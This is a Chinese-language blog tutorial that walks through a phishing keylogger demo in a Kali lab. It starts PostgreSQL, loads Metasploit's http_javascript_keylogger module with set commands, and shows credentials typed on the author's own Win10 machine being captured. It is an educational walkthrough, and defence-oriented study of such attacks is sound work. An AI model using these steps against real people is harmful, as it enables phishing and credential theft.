Kali与编程:小白黑客带你进行钓鱼网站攻防演练【下节更精彩】

(以下步骤配合克隆网站才算成功)
用户键盘输入被不法分子监控和记录的套路是怎么样子的?
准备工作
实验环境:kali2019 和win10(我自己的真机)
查看postgresql服务的状态:service postgresql status
若没有打开则输入:service postgresql start 临时开启服务
或者永久开启即:update -rc.d postgresql enable
服务打开后如下面所示
在这里插入图片描述

Kali:
进入msfconsole框架
在这里插入图片描述

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
search keylogger
使用search keylogger攻击模块:use auxiliary/server/capture/http_javascript_keylogger
在这里插入图片描述
在这里插入图片描述

show options查看要设置的内容
在这里插入图片描述

set demo true
set uipath /
run
生成local ip
在这里插入图片描述

本机:
将生成IP在浏览器登录(由于我还未克隆网站,所以简陋了一些)
在这里插入图片描述

随便输入用户名和密码看看能否监控
在这里插入图片描述

发现kali已经监控成功
在这里插入图片描述

点我学习完整视频渗透课,预计更新1000节

posted @ 2021-06-24 23:55  Kali与编程  阅读(45)  评论(0)    收藏  举报  来源